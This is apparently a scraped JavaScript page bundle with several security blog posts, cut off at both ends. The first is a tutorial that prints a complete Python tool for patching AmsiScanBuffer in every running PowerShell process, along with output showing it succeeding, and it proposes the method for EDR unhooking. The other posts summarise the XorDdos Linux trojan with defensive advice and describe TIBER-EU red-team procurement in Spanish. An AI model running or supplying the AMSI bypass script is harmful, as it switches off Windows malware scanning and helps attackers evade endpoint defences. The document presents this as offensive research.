{hex(amsiScanBufferAddress)}')\",language:\"Python\"})})}),/*#__PURE__*/e(\"p\",{children:\"Let's check it:\"}),/*#__PURE__*/e(\"div\",{className:\"framer-text-module\",style:{height:\"auto\",width:\"100%\"},children:/*#__PURE__*/e(n,{componentIdentifier:\"module:pVk4QsoHxASnVtUBp6jr/HTBsNkEMAb7TUGaO3DBy/CodeBlock.js:default\",children:t=>/*#__PURE__*/e(s,{...t,code:\"PS C:\\\\Users\\\\aroldan> python3 .\\\\Documents\\\\amsibypass.py\\n[+] Got process handle of PID powershell at 18760: 0x410\\n[+] Found base address of amsi.dll: 0x7ffd4c270000\\n[+] Address of AmsiScanBuffer found at 0x7ffd4c278260\",language:\"C#\"})})}),/*#__PURE__*/e(\"p\",{children:\"Wonderful!\"}),/*#__PURE__*/e(\"h3\",{children:\"Patch AmsiScanBuffer\"}),/*#__PURE__*/t(\"p\",{children:[\"Now that we found our target address, we can patch it with the payload we discussed in our \",/*#__PURE__*/e(o,{href:\"https://fluidattacks.com/blog/amsi-bypass/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!1,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(a.a,{children:\"previous post\"})}),\":\"]}),/*#__PURE__*/e(\"div\",{className:\"framer-text-module\",style:{height:\"auto\",width:\"100%\"},children:/*#__PURE__*/e(n,{componentIdentifier:\"module:pVk4QsoHxASnVtUBp6jr/HTBsNkEMAb7TUGaO3DBy/CodeBlock.js:default\",children:t=>/*#__PURE__*/e(s,{...t,code:\"xor eax,eax\\nret\",language:\"C#\"})})}),/*#__PURE__*/e(\"p\",{children:\"Let's create a variable with that:\"}),/*#__PURE__*/e(\"div\",{className:\"framer-text-module\",style:{height:\"auto\",width:\"100%\"},children:/*#__PURE__*/e(n,{componentIdentifier:\"module:pVk4QsoHxASnVtUBp6jr/HTBsNkEMAb7TUGaO3DBy/CodeBlock.js:default\",children:t=>/*#__PURE__*/e(s,{...t,code:\"patchPayload = (\\n b'\\\\x29\\\\xc0' + # xor eax,eax\\n b'\\\\xc3' # ret\\n)\",language:\"Python\"})})}),/*#__PURE__*/e(\"p\",{children:\"I also wrote the following function to help with the patching:\"}),/*#__PURE__*/e(\"div\",{className:\"framer-text-module\",style:{height:\"auto\",width:\"100%\"},children:/*#__PURE__*/e(n,{componentIdentifier:\"module:pVk4QsoHxASnVtUBp6jr/HTBsNkEMAb7TUGaO3DBy/CodeBlock.js:default\",children:t=>/*#__PURE__*/e(s,{...t,code:\"def writeBuffer(handle, address, buffer):\\n nBytes = c_int(0)\\n KERNEL32.WriteProcessMemory.argtypes = [c_ulong, c_void_p, c_void_p, c_ulong, c_void_p]\\n res = KERNEL32.WriteProcessMemory(handle, address, buffer, len(buffer), byref(nBytes))\\n if not res:\\n print(f'[-] WriteProcessMemory Error: {KERNEL32.GetLastError()}')\\n return res\",language:\"Python\"})})}),/*#__PURE__*/t(\"p\",{children:[\"It will take the process handle, the address of \",/*#__PURE__*/e(\"code\",{children:\"AmsiScanBuffer\"}),\" that we discovered and the patching payload. Then, using \",/*#__PURE__*/e(\"code\",{children:\"WriteProcessMemory()\"}),\" it will patch \",/*#__PURE__*/e(\"code\",{children:\"AmsiScanBuffer\"}),\" with our instructions.\"]}),/*#__PURE__*/e(\"p\",{children:\"The relevant updated part of the script is now:\"}),/*#__PURE__*/e(\"div\",{className:\"framer-text-module\",style:{height:\"auto\",width:\"100%\"},children:/*#__PURE__*/e(n,{componentIdentifier:\"module:pVk4QsoHxASnVtUBp6jr/HTBsNkEMAb7TUGaO3DBy/CodeBlock.js:default\",children:t=>/*#__PURE__*/e(s,{...t,code:\"amsiScanBufferAddress = readBuffer(process_handle, amsiDllBaseAddress, AmsiScanBuffer)\\nprint(f'[+] Address of AmsiScanBuffer found at {hex(amsiScanBufferAddress)}')\\n\\npatchPayload = (\\n b'\\\\x29\\\\xc0' + # xor eax,eax\\n b'\\\\xc3' # ret\\n)\\n\\nif writeBuffer(process_handle, amsiScanBufferAddress, patchPayload):\\n print(f'[+] Success patching AmsiScanBuffer in PID {pid}')\",language:\"Python\"})})}),/*#__PURE__*/e(\"p\",{children:\"Let's check it:\"}),/*#__PURE__*/e(\"div\",{className:\"framer-text-module\",style:{height:\"auto\",width:\"100%\"},children:/*#__PURE__*/e(n,{componentIdentifier:\"module:pVk4QsoHxASnVtUBp6jr/HTBsNkEMAb7TUGaO3DBy/CodeBlock.js:default\",children:t=>/*#__PURE__*/e(s,{...t,code:\"PS C:\\\\Users\\\\aroldan> python3 .\\\\Documents\\\\amsibypass.py\\n[+] Got process handle of PID powershell at 18760: 0x410\\n[+] Found base address of amsi.dll: 0x7ffd4c270000\\n[+] Address of AmsiScanBuffer found at 0x7ffd4c278260\\n[+] Success patching AmsiScanBuffer in PID 18760\",language:\"C#\"})})}),/*#__PURE__*/e(\"p\",{children:\"Great!\"}),/*#__PURE__*/e(\"h3\",{children:\"Profit\"}),/*#__PURE__*/e(\"p\",{children:\"Now, let's check how it works:\"}),/*#__PURE__*/e(\"img\",{alt:\"AMSI success\",className:\"framer-image\",height:\"355\",src:\"https://framerusercontent.com/images/CuSvAXUu6LQtOcDQZWoJdbb4TA.png\",srcSet:\"https://framerusercontent.com/images/CuSvAXUu6LQtOcDQZWoJdbb4TA.png?scale-down-to=512 512w,https://framerusercontent.com/images/CuSvAXUu6LQtOcDQZWoJdbb4TA.png 972w\",style:{aspectRatio:\"972 / 711\"},width:\"486\"}),/*#__PURE__*/e(\"p\",{children:\"Great! AMSI successfully bypassed again. This time with a whole different process using cross-process memory patching.\"}),/*#__PURE__*/e(\"p\",{children:\"This is the final script. I rearranged it adding some functions for better readability:\"}),/*#__PURE__*/e(\"div\",{className:\"framer-text-module\",style:{height:\"auto\",width:\"100%\"},children:/*#__PURE__*/e(n,{componentIdentifier:\"module:pVk4QsoHxASnVtUBp6jr/HTBsNkEMAb7TUGaO3DBy/CodeBlock.js:default\",children:t=>/*#__PURE__*/e(s,{...t,code:\"#!/usr/bin/env python3\\n#\\n# Script to dynamically path AmsiScanBuffer on every powershell process running\\n# that belongs to current user, or all processes if running as admin\\n#\\n# Author: Andres Roldan\\n# LinkedIn: https://www.linkedin.com/in/andres-roldan/\\n# Twitter: https://twitter.com/andresroldan\\n\\n\\nimport psutil\\nimport sys\\nfrom ctypes import *\\n\\n\\nKERNEL32 = windll.kernel32\\nPROCESS_ACCESS = (\\n 0x000F0000 | # STANDARD_RIGHTS_REQUIRED\\n 0x00100000 | # SYNCHRONIZE\\n 0xFFFF\\n)\\nPAGE_READWRITE = 0x40\\n\\n\\ndef getPowershellPids():\\n ppids = [pid for pid in psutil.pids() if psutil.Process(pid).name() == 'powershell.exe']\\n return ppids\\n\\n\\ndef readBuffer(handle, baseAddress, AmsiScanBuffer):\\n KERNEL32.ReadProcessMemory.argtypes = [c_ulong, c_void_p, c_void_p, c_ulong, c_int]\\n while True:\\n lpBuffer = create_string_buffer(b'', len(AmsiScanBuffer))\\n nBytes = c_int(0)\\n KERNEL32.ReadProcessMemory(handle, baseAddress, lpBuffer, len(lpBuffer), nBytes)\\n if lpBuffer.value == AmsiScanBuffer or lpBuffer.value.startswith(b'\\\\x29\\\\xc0\\\\xc3'):\\n return baseAddress\\n else:\\n baseAddress += 1\\n\\n\\ndef writeBuffer(handle, address, buffer):\\n nBytes = c_int(0)\\n KERNEL32.WriteProcessMemory.argtypes = [c_ulong, c_void_p, c_void_p, c_ulong, c_void_p]\\n res = KERNEL32.WriteProcessMemory(handle, address, buffer, len(buffer), byref(nBytes))\\n if not res:\\n print(f'[-] WriteProcessMemory Error: {KERNEL32.GetLastError()}')\\n return res\\n\\n\\ndef getAmsiScanBufferAddress(handle, baseAddress):\\n AmsiScanBuffer = (\\n b'\\\\x4c\\\\x8b\\\\xdc' + # mov r11,rsp\\n b'\\\\x49\\\\x89\\\\x5b\\\\x08' + # mov qword ptr [r11+8],rbx\\n b'\\\\x49\\\\x89\\\\x6b\\\\x10' + # mov qword ptr [r11+10h],rbp\\n b'\\\\x49\\\\x89\\\\x73\\\\x18' + # mov qword ptr [r11+18h],rsi\\n b'\\\\x57' + # push rdi\\n b'\\\\x41\\\\x56' + # push r14\\n b'\\\\x41\\\\x57' + # push r15\\n b'\\\\x48\\\\x83\\\\xec\\\\x70' # sub rsp,70h\\n )\\n return readBuffer(handle, baseAddress, AmsiScanBuffer)\\n\\n\\ndef patchAmsiScanBuffer(handle, funcAddress):\\n patchPayload = (\\n b'\\\\x29\\\\xc0' + # xor eax,eax\\n b'\\\\xc3' # ret\\n )\\n return writeBuffer(handle, funcAddress, patchPayload)\\n\\n\\ndef getAmsiDllBaseAddress(handle, pid):\\n MAX_PATH = 260\\n MAX_MODULE_NAME32 = 255\\n TH32CS_SNAPMODULE = 0x00000008\\n class MODULEENTRY32(Structure):\\n _fields_ = [ ('dwSize', c_ulong) ,\\n ('th32ModuleID', c_ulong),\\n ('th32ProcessID', c_ulong),\\n ('GlblcntUsage', c_ulong),\\n ('ProccntUsage', c_ulong) ,\\n ('modBaseAddr', c_size_t) ,\\n ('modBaseSize', c_ulong) ,\\n ('hModule', c_void_p) ,\\n ('szModule', c_char * (MAX_MODULE_NAME32+1)),\\n ('szExePath', c_char * MAX_PATH)]\\n\\n me32 = MODULEENTRY32()\\n me32.dwSize = sizeof(MODULEENTRY32)\\n snapshotHandle = KERNEL32.CreateToolhelp32Snapshot(TH32CS_SNAPMODULE, pid)\\n ret = KERNEL32.Module32First(snapshotHandle, pointer(me32))\\n while ret:\\n if me32.szModule == b'amsi.dll':\\n print(f'[+] Found base address of {me32.szModule.decode()}: {hex(me32.modBaseAddr)}')\\n KERNEL32.CloseHandle(snapshotHandle)\\n return getAmsiScanBufferAddress(handle, me32.modBaseAddr)\\n else:\\n ret = KERNEL32.Module32Next(snapshotHandle , pointer(me32))\\n\\n\\nfor pid in getPowershellPids():\\n process_handle = KERNEL32.OpenProcess(PROCESS_ACCESS, False, pid)\\n if not process_handle:\\n continue\\n print(f'[+] Got process handle of powershell at {pid}: {hex(process_handle)}')\\n print(f'[+] Trying to find AmsiScanBuffer in {pid} process memory...')\\n amsiDllBaseAddress = getAmsiDllBaseAddress(process_handle, pid)\\n if not amsiDllBaseAddress:\\n print(f'[-] Error finding amsiDllBaseAddress in {pid}.')\\n print(f'[-] Error: {KERNEL32.GetLastError()}')\\n sys.exit(1)\\n else:\\n print(f'[+] Trying to patch AmsiScanBuffer found at {hex(amsiDllBaseAddress)}')\\n if not patchAmsiScanBuffer(process_handle, amsiDllBaseAddress):\\n print(f'[-] Error patching AmsiScanBuffer in {pid}.')\\n print(f'[-] Error: {KERNEL32.GetLastError()}')\\n sys.exit(1)\\n else:\\n print(f'[+] Success patching AmsiScanBuffer in PID {pid}')\\n KERNEL32.CloseHandle(process_handle)\\n print('')\",language:\"Python\"})})}),/*#__PURE__*/t(\"p\",{children:[\"You can also download it from \",/*#__PURE__*/e(o,{href:\"https://fluidattacks.docsend.com/view/w89kfi2j56hc6ca5\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!1,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(a.a,{children:\"here\"})}),\".\"]}),/*#__PURE__*/e(\"h2\",{children:\"Conclusion\"}),/*#__PURE__*/e(\"p\",{children:\"I hope you liked the journey of creating this tool. This technique can be used in other evasion tasks, such as EDR API unhooking.\"}),/*#__PURE__*/e(\"p\",{children:\"PowerShell weaponization is not death. As you can see, AMSI can be easily bypassed using entirely different, often unbelievable ways.\"})]});export const richText1=/*#__PURE__*/e(r.Fragment,{children:/*#__PURE__*/t(\"p\",{children:[\"It has been a while since we covered issues on Linux. Last time, \",/*#__PURE__*/e(o,{href:\"https://fluidattacks.com/blog/linux-polkit-vulnerability/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!1,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(a.a,{children:\"we talked about PwnKit\"})}),', an \"ancient\" vulnerability common to several distributions that allowed privilege escalation to achieve root user permissions. Now, we look at a Linux Trojan that acts as a distributed denial of service (DDoS) ',/*#__PURE__*/e(o,{href:\"https://www.merriam-webster.com/dictionary/botnet\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(a.a,{children:\"botnet\"})}),\". Though this Trojan was \",/*#__PURE__*/e(o,{href:\"https://blog.malwaremustdie.org/2014/09/mmd-0028-2014-fuzzy-reversing-new-china.html\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(a.a,{children:\"discovered in 2014\"})}),\", the Microsoft 365 Defender Research Team \",/*#__PURE__*/e(o,{href:\"https://www.microsoft.com/security/blog/2022/05/19/rise-in-xorddos-a-deeper-look-at-the-stealthy-ddos-malware-targeting-linux-devices/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(a.a,{children:\"says\"})}),\" they have observed a 254% jump in its activity over the last six months. Let's see what it is about.\"]})});export const richText2=/*#__PURE__*/t(r.Fragment,{children:[/*#__PURE__*/e(\"h2\",{children:\"What is XOR DDoS?\"}),/*#__PURE__*/t(\"p\",{children:[\"The Trojan's name is XOR DDoS (or XorDdos). Let's break that name down real quick: XOR refers to the form of encryption it uses for communications with its command-and-control \",/*#__PURE__*/e(o,{href:\"https://www.techtarget.com/whatis/definition/command-and-control-server-CC-server\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(a.a,{children:\"(C2) server\"})}),\" (e.g., it writes the string \",/*#__PURE__*/e(\"code\",{children:\"m6_6n3\"}),\" to mean directory \",/*#__PURE__*/e(\"code\",{children:\"/tmp\"}),\"), and DDoS refers to the \",/*#__PURE__*/e(o,{href:\"https://attack.mitre.org/techniques/T1498/001/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(a.a,{children:\"kind of attack\"})}),\" it carries out. This Trojan accomplishes DDoS by flooding the server with threads (i.e., lightweight processes), which are so many that, in the end, legitimate clients are denied the targeted resources, or the server crashes. These attacks can also be a way to mask the attacker's further malicious activities, which include gaining unauthorized access.\"]}),/*#__PURE__*/t(\"p\",{children:[\"Back in 2014, when the \",/*#__PURE__*/e(o,{href:\"https://fluidattacks.com/blog/what-is-ethical-hacking/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!1,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(a.a,{children:\"ethical hacking\"})}),\" group \",/*#__PURE__*/e(o,{href:\"https://www.malwaremustdie.org/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(a.a,{children:\"MalwareMustDie\"})}),\" discovered this Trojan, they attributed it to Chinese threat actors and warned how serious it was, given its complexity and how hard it was to detect. By 2015, the Trojan \",/*#__PURE__*/e(o,{href:\"https://thehackernews.com/2015/09/xor-ddos-attack.html\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(a.a,{children:\"was said\"})}),\" to have compromised more than 20 websites per day, mainly in Asia. It has become more pervasive in recent years, rising as \",/*#__PURE__*/e(o,{href:\"https://thehackernews.com/2022/05/microsoft-warns-rise-in-xorddos-malware.html\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(a.a,{children:\"the top threat\"})}),\" to Linux machines. Reportedly, XOR DDoS has been affecting Internet of Things (IoT) devices and cloud infrastructures, progressively gaining points from which to launch further attacks.\"]}),/*#__PURE__*/t(\"p\",{children:[\"XOR DDoS attempts to get access to systems \",/*#__PURE__*/e(o,{href:\"https://www.microsoft.com/security/blog/2022/05/19/rise-in-xorddos-a-deeper-look-at-the-stealthy-ddos-malware-targeting-linux-devices/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(a.a,{children:\"mainly\"})}),\" by conducting \",/*#__PURE__*/e(o,{href:\"https://fluidattacks.com/blog/pass-cracking/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!1,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(a.a,{children:\"brute force attacks\"})}),\" on devices across loads of servers. Once it finds credentials that work on a device, this Trojan runs a script with root privileges to download and install itself on the device. It uses clever ways to conceal how it got there, like downloading itself to a temporary file storage directory or overwriting log files.\"]}),/*#__PURE__*/e(\"p\",{children:\"This Trojan has several persistence mechanisms, that is, techniques to keep its access to systems across restarts. Put simply, it stores scripts to determine that it should be run every time the system starts up. Its mechanisms are plenty so that at least one of them works on any of several Linux distributions.\"}),/*#__PURE__*/t(\"p\",{children:[\"Another malicious action that XOR DDoS does is it sends device information to the threat actor. As \",/*#__PURE__*/e(o,{href:\"https://www.microsoft.com/security/blog/2022/05/19/rise-in-xorddos-a-deeper-look-at-the-stealthy-ddos-malware-targeting-linux-devices/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(a.a,{children:\"reported by Microsoft\"})}),', it includes \"OS release version, malware version, rootkit presence, memory stats, CPU information, and LAN speed.\" This data can be used to plan more specific, custom attacks on the device. An example of this is that another Linux Trojan called Tsunami was contracted later by some of the infected devices but, as Microsoft explained, this other Trojan was not installed by XOR DDoS, so it is likely that the latter \"is leveraged as a vector for follow-on activities.\"']}),/*#__PURE__*/e(\"p\",{children:\"To perform DDoS, the Trojan enumerates the processors in the device and then moves on to create threads twice that number. After that, the Trojan receives commands from the C2 server to flood the device, rendering it unable to respond.\"}),/*#__PURE__*/e(\"h2\",{children:\"What Linux users should be doing about XOR DDoS\"}),/*#__PURE__*/t(\"p\",{children:[\"Currently, a generalized warning has been made to Linux administrators. They are being urged to have the latest endpoint and server defenses on their systems. The risk is clear: DDoS attacks are a big deal. They are even used as a weapon in cyberwar. This has been reported, for example, in the \",/*#__PURE__*/e(o,{href:\"https://fluidattacks.com/blog/timeline-new-cyberwar/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!1,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(a.a,{children:\"conflict between Russia and Ukraine\"})}),\". Moreover, as shown in a \",/*#__PURE__*/e(o,{href:\"https://securelist.com/ddos-attacks-in-q1-2022/106358/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(a.a,{children:\"report by Kaspersky\"})}),\", this kind of attack hit record numbers in the first quarter of the current year. An aggravating factor is that, as mentioned, many of the Internet-connected devices that have been affected are IoT devices. This poses a challenge for many users because \",/*#__PURE__*/e(o,{href:\"https://techmonitor.ai/technology/cybersecurity/xorddos-malware-targeting-linux-devices\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(a.a,{children:\"these are often not properly secured\"})}),\", as manufacturers prioritize quickly getting the product out in the market.\"]}),/*#__PURE__*/t(\"p\",{children:[\"There are some \",/*#__PURE__*/e(o,{href:\"https://www.microsoft.com/security/blog/2022/05/19/rise-in-xorddos-a-deeper-look-at-the-stealthy-ddos-malware-targeting-linux-devices/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(a.a,{children:\"specific things\"})}),' that Linux administrators should start doing right now. First thing is becoming aware of whether their systems are being targeted. It could be the case if they detect a large number of failed login attempts. Also, some ways of protecting their Internet-facing servers are to deploy antimalware software and disallow remote password access. Furthermore, administrators need to \"enable network protection to prevent applications or users from accessing malicious domains and other malicious content on the internet.\" Lastly, all other users should be urged to be cautious too. They really need to take security measures as simple as creating and rotating strong passphrases (even ',/*#__PURE__*/e(o,{href:\"https://help.fluidattacks.com/portal/en/kb/articles/criteria-requirements-132/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(a.a,{children:\"more secure than passwords\"})}),\") and complying with the activation of multi-factor authentication.\"]}),/*#__PURE__*/e(\"p\",{children:\"Did you like this post? Then subscribe to our newsletter to be up to date on the latest cyberattacks and cybersecurity trends.\"})]});export const richText3=/*#__PURE__*/e(r.Fragment,{children:/*#__PURE__*/t(\"p\",{children:[/*#__PURE__*/e(o,{href:\"https://fluidattacks.com/es/blog/marco-tiber-eu/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!1,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(a.a,{children:\"\\xbfHas o\\xeddo hablar del TIBER-EU?\"})}),\" Esta pregunta es el t\\xedtulo que dimos a un art\\xedculo del blog la semana pasada, presentando esa iniciativa liderada por el Banco Central Europeo principalmente para evaluar y proteger los sistemas financieros de la eurozona. En este nuevo art\\xedculo, nos centramos expl\\xedcitamente en los requisitos del TIBER-EU para los proveedores de inteligencia de amenazas (TI por sus iniciales en ingl\\xe9s) y \",/*#__PURE__*/e(o,{href:\"https://fluidattacks.com/es/blog/ejercicio-red-teaming/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!1,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(a.a,{children:/*#__PURE__*/e(\"em\",{children:\"red teaming\"})})}),\" RT. Estas empresas son las encargadas de analizar las amenazas potenciales y realizar \",/*#__PURE__*/e(o,{href:\"https://fluidattacks.com/es/blog/que-es-hacking-etico/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!1,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/t(a.a,{children:[/*#__PURE__*/e(\"em\",{children:\"hacking\"}),\" \\xe9tico\"]})}),\" contra las entidades financieras europeas para poner a prueba su ciberseguridad y ciberresiliencia. Las partes interesadas no deben hacer una elecci\\xf3n improvisada de los proveedores. Para ello existen las \",/*#__PURE__*/e(o,{href:\"https://www.ecb.europa.eu/pub/pdf/other/ecb.1808tiber_eu_framework.en.pdf\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(a.a,{children:\"pautas de contrataci\\xf3n de servicios (Services Procurement Guidelines)\"})}),\" del TIBER-EU, que tomamos como referencia para este segundo art\\xedculo de la serie. Te invitamos a revisar el documento completo para m\\xe1s detalles sobre lo que presentamos aqu\\xed.\"]})});export const richText4=/*#__PURE__*/t(r.Fragment,{children:[/*#__PURE__*/e(\"h2\",{children:\"\\xbfQu\\xe9 encontramos en las pautas de contrataci\\xf3n de servicios?\"}),/*#__PURE__*/e(\"p\",{children:\"Como se indica en las pautas de contrataci\\xf3n de servicios, debido a la naturaleza sensible de las pruebas TIBER-EU, las entidades deben seleccionar cuidadosamente a proveedores de TI y RT que puedan proporcionar un nivel adecuado de experiencia profesional y apoyo para la realizaci\\xf3n de la prueba. Estas pautas indican los requisitos y est\\xe1ndares que deben cumplir los proveedores de TI y RT para realizar las pruebas TIBER-EU. Ofrecen orientaci\\xf3n y criterios de selecci\\xf3n para las entidades que deseen contratar proveedores. Y tambi\\xe9n ofrecen preguntas y listas de verificaci\\xf3n de acuerdos que ayudan a formalizar el proceso de contrataci\\xf3n. El TIBER-EU Knowledge Centre se encarga de hacer un seguimiento del mercado de TI y RT y de introducir cambios en los requisitos de las pautas siempre que sea necesario.\"}),/*#__PURE__*/e(\"h3\",{children:\"Pautas relacionadas a los proveedores de inteligencia de amenazas\"}),/*#__PURE__*/e(\"p\",{children:\"El proveedor de TI tiene la misi\\xf3n de proporcionar una imagen clara de la superficie de ataque de la entidad evaluada y generar escenarios de amenazas que imiten la realidad. Estos sirven de base para los escenarios de ataque que utilizar\\xe1 el proveedor de RT. El proveedor debe conocer a los actores de amenaza, sus capacidades, motivos y metodolog\\xedas, especialmente en lo que respecta al tipo de entidad del que se trate. En cuanto a este objetivo de pruebas, el proveedor de TI debe conocer sus operaciones, funciones cr\\xedticas y personal, as\\xed como sus puntos d\\xe9biles.\"}),/*#__PURE__*/t(\"p\",{children:[\"Entre los requisitos para el proveedor de TI est\\xe1 tener al menos tres referencias de asignaciones previas relacionadas con pruebas de \",/*#__PURE__*/e(\"em\",{children:\"red team\"}),\" dirigidas por inteligencia de amenazas. Adem\\xe1s, TIBER-EU menciona un seguro de indemnizaci\\xf3n adecuado con el que el proveedor pueda responder a situaciones comprometedoras, como las que podr\\xedan derivarse de la negligencia. Debe haber un responsable de TI que dirija y supervise las actividades. Este deber\\xeda tener al menos cinco a\\xf1os de experiencia en el \\xe1rea, de los cuales al menos tres deber\\xedan ser en proyectos del sector financiero. Adicionalmente, deber\\xeda poseer certificaciones como el CREST Certified Threat Intelligence Manager (CCTIM) y el Offensive Security Certified Expert (OSCE).\"]}),/*#__PURE__*/t(\"p\",{children:[\"Por parte de los miembros del equipo de TI, cada uno deber\\xeda poseer al menos dos a\\xf1os de experiencia en inteligencia de amenazas. Se requiere un equipo multidisciplinar con un amplio espectro de conocimientos, incluyendo OSINT, HUMINT y conocimientos geopol\\xedticos. Entre la amplia gama de certificaciones que podr\\xedan haber obtenido se encuentran la CREST Certified Simulated Attack Specialist (CCSAS), la Cybersecurity Nexus (CSX), la Certified Information Systems Security Professional (CISSP) y la Systems Security Certified Practitioner (SSCP). Se espera que el equipo haya proporcionado inteligencia de amenazas para pruebas de \",/*#__PURE__*/e(\"em\",{children:\"red team\"}),\" en el pasado.\"]}),/*#__PURE__*/e(\"p\",{children:\"La entidad receptora de la prueba TIBER-EU es la encargada de verificar que el proveedor de TI cumpla estas y otras normas establecidas en las pautas. No obstante, puede encomendar esta responsabilidad a organismos de acreditaci\\xf3n y certificaci\\xf3n de la Uni\\xf3n Europea. La entidad deber\\xeda buscar un proveedor de TI con expertos t\\xe9cnicos que puedan explicar su metodolog\\xeda y con personal de apoyo. Deber\\xeda ser una compa\\xf1\\xeda con un dominio maduro de los est\\xe1ndares \\xe9ticos y adscrita a un c\\xf3digo de conducta reconocido. Deber\\xeda ser un proveedor que garantice que gestionar\\xe1 adecuadamente los sistemas y los riesgos de informaci\\xf3n de la entidad. Adem\\xe1s, la entidad deber\\xeda solicitar evidencia de las pol\\xedticas de seguridad de la informaci\\xf3n del posible proveedor.\"}),/*#__PURE__*/t(\"h3\",{children:[\"Pautas relacionadas con los proveedores de \",/*#__PURE__*/e(\"em\",{children:\"red teaming\"})]}),/*#__PURE__*/t(\"p\",{children:[\"De acuerdo con el Marco TIBER-EU, la entidad debe asegurarse de que el proveedor de RT llevar\\xe1 a cabo una prueba de \",/*#__PURE__*/e(\"em\",{children:\"red team\"}),\" dirigida por inteligencia y no solo una \",/*#__PURE__*/e(o,{href:\"https://fluidattacks.com/es/soluciones/pruebas-penetracion-servicio/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!1,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(a.a,{children:\"prueba de penetraci\\xf3n\"})}),\". La principal distinci\\xf3n entre estos dos m\\xe9todos de prueba es la siguiente: el primero incluye un escenario completo con personas, procesos y tecnolog\\xedas en la evaluaci\\xf3n. El segundo suele centrarse en los sistemas y sus vulnerabilidades t\\xe9cnicas y de configuraci\\xf3n. Siguiendo los esfuerzos del proveedor de TI, este otro proveedor toma escenarios de amenazas y los convierte en ataques. El proveedor de RT deber\\xeda tener como objetivo evaluar la postura de ciberresiliencia de la entidad en funci\\xf3n de la amenaza a la que se enfrenta. Siempre deber\\xeda haber una estrecha relaci\\xf3n entre los proveedores para estructurar y actualizar los planes de prueba y generar y entregar el informe final.\"]}),/*#__PURE__*/t(\"p\",{children:[\"Como en el caso del proveedor de TI, el proveedor de RT debe contar con varios a\\xf1os de experiencia, un seguro de indemnizaci\\xf3n y un gestor competente y cualificado. Aparte de la mencionada OSCE, el director de pruebas de \",/*#__PURE__*/e(\"em\",{children:\"red team\"}),\" tambi\\xe9n deber\\xeda poseer un certificado como el CREST Certified Simulated Attack Manager (CCSAM). Los miembros del equipo deber\\xedan poseer al menos dos a\\xf1os de experiencia en pruebas de \",/*#__PURE__*/e(\"em\",{children:\"red team\"}),\". Entre los conocimientos y aptitudes que debe tener el \",/*#__PURE__*/e(\"em\",{children:\"red team\"}),\", TIBER-EU sugiere los siguientes: conocimientos empresariales, pruebas de \",/*#__PURE__*/e(\"em\",{children:\"red team\"}),\", pruebas de penetraci\\xf3n, reconocimiento, inteligencia de amenazas, gesti\\xf3n de riesgos, desarrollo de \",/*#__PURE__*/e(\"em\",{children:\"exploits\"}),\", penetraci\\xf3n f\\xedsica, ingenier\\xeda social y an\\xe1lisis de vulnerabilidades.\"]}),/*#__PURE__*/t(\"p\",{children:[\"Las 